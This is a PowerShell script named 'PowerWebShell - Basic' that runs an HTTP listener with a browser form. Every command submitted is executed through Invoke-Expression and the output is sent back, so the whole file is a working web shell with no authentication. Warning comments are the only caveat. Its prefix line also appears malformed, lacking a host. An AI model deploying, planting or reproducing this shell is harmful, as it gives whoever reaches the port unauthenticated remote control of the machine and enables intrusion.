PowerWebShell - Basic

powawebshell.ps1

# PowerShell Web Command Executor
# WARNING: This script allows remote command execution and poses significant security risks
# Use only in isolated/trusted environments with proper security measures

# Configuration
$port = 8080
$prefix = "http://" + $port + "/"

# Create HTTP listener
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add($prefix)
$listener.Start()

Write-Host "Server started on" $prefix
Write-Host "Press Ctrl+C to stop"
Write-Host ""
Write-Host "SECURITY WARNING: This server allows remote command execution!"
Write-Host ""

try {
    while ($listener.IsListening) {
        # Wait for request
        $context = $listener.GetContext()
        $request = $context.Request
        $response = $context.Response
        
        $output = ""
        
        # Handle different request types
        if ($request.HttpMethod -eq "GET" -and $request.Url.AbsolutePath -eq "/") {
            # Serve HTML form
            $html = @"
<!DOCTYPE html>
<html>
<head>
    <title>Command</title>
</head>
<body>
    <form id="cmdForm">
        <input type="text" id="command" name="command" size="50" autofocus>
        <button type="submit">Run</button>
    </form>
    <pre id="output"></pre>
    <script>
        document.getElementById('cmdForm').addEventListener('submit', async (e) => {
            e.preventDefault();
            const command = document.getElementById('command').value;
            const outputDiv = document.getElementById('output');
            
            if (!command.trim()) {
                outputDiv.textContent = '';
                return;
            }
            
            outputDiv.textContent = 'Executing...';
            
            try {
                const response = await fetch('/execute', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded',
                    },
                    body: 'command=' + encodeURIComponent(command)
                });
                
                const result = await response.text();
                outputDiv.textContent = result;
            } catch (error) {
                outputDiv.textContent = 'Error: ' + error.message;
            }
        });
    </script>
</body>
</html>
"@
            $buffer = [System.Text.Encoding]::UTF8.GetBytes($html)
            $response.ContentType = "text/html"
            $response.ContentLength64 = $buffer.Length
            $response.OutputStream.Write($buffer, 0, $buffer.Length)
        }
        elseif ($request.HttpMethod -eq "POST" -and $request.Url.AbsolutePath -eq "/execute") {
            # Execute command
            $reader = New-Object System.IO.StreamReader($request.InputStream)
            $body = $reader.ReadToEnd()
            $reader.Close()
            
            # Parse command from POST data
            $command = ""
            if ($body -match "command=([^&]*)") {
                $command = [System.Uri]::UnescapeDataString($matches[1])
            }
            
            Write-Host ("Executing: " + $command)
            
            try {
                # Execute the command and capture output
                $result = Invoke-Expression $command 2>&1 | Out-String
                $output = $result
            }
            catch {
                $output = "Error: " + $_.Exception.Message
            }
            
            $buffer = [System.Text.Encoding]::UTF8.GetBytes($output)
            $response.ContentType = "text/plain"
            $response.ContentLength64 = $buffer.Length
            $response.OutputStream.Write($buffer, 0, $buffer.Length)
        }
        else {
            # 404 for other paths
            $response.StatusCode = 404
            $buffer = [System.Text.Encoding]::UTF8.GetBytes("Not Found")
            $response.OutputStream.Write($buffer, 0, $buffer.Length)
        }
        
        $response.Close()
    }
}
finally {
    $listener.Stop()
    Write-Host "Server stopped"
}